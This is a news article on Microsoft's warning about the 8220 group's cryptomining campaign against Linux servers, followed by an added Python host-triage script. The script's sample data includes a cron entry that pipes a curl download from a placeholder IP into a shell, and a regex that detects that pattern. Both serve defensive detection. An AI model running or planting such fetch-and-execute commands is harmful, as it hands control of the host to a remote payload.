Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers
A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.
"The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday.
8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control servers over port 8220.
Now, according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server and Oracle WebLogic for initial access.
Besides achieving persistence by means of a cron job, the "Loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate," Microsoft said.
The attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.
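Host triage for the behaviours described above, as an added example that is not part of the article or of Microsoft's tooling. Port 8220 and the tool names come from the article; the cron pattern (a fetch piped into a shell), the `ss -tnp` row layout and all sample data are assumptions constructed for illustration.

```python
import re

# Heuristic (assumption, not from the article): cron entries that fetch a
# remote script and pipe it straight into a shell.
CRON_FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|#]*\|\s*(ba)?sh\b")
C2_PORT = 8220                      # port the article says the group prefers
TOOL_NAMES = {"masscan", "spirit"}  # tools named in Microsoft's statement


def check_cron(lines):
    """Return non-comment cron entries that download and execute in one step."""
    entries = (line.strip() for line in lines)
    return [e for e in entries
            if e and not e.startswith("#") and CRON_FETCH_EXEC.search(e)]


def check_connections(ss_lines):
    """Return (peer, process) for established TCP sessions to a remote port 8220.

    Expects `ss -tnp` style rows: State Recv-Q Send-Q Local Peer [Process].
    """
    hits = []
    for line in ss_lines:
        cols = line.split()
        if len(cols) < 5 or cols[0] != "ESTAB":
            continue  # skip headers, listeners and malformed rows
        port = cols[4].rsplit(":", 1)[-1]
        if port.isdigit() and int(port) == C2_PORT:
            hits.append((cols[4], cols[5] if len(cols) > 5 else ""))
    return hits


def check_processes(paths):
    """Return process paths whose basename matches a tool named in the article."""
    return sorted({p for p in paths if p.rsplit("/", 1)[-1] in TOOL_NAMES})


# Constructed sample data (documentation address ranges, not real indicators).
SAMPLE_CRON = ["# m h dom mon dow command",
               "0 3 * * * /usr/local/bin/backup.sh",
               "*/30 * * * * curl -fsSL http://192.0.2.10/x.sh | sh"]
SAMPLE_SS = ['ESTAB 0 0 10.0.0.5:22 10.0.0.9:51544 users:(("sshd",pid=812,fd=4))',
             'ESTAB 0 0 10.0.0.5:40112 198.51.100.7:8220 users:(("kworker",pid=3310,fd=3))',
             "LISTEN 0 128 0.0.0.0:8220 0.0.0.0:*"]
SAMPLE_PS = ["/usr/sbin/sshd", "/tmp/.x/masscan", "nginx", "spirit"]

if __name__ == "__main__":
    print("cron:", check_cron(SAMPLE_CRON))
    print("connections:", check_connections(SAMPLE_SS))
    print("processes:", check_processes(SAMPLE_PS))
```

A process-name match is only a lead, since binaries can be renamed and "spirit" is a generic name; treat a hit as a reason to inspect the binary and its parent process.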
News URL
https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html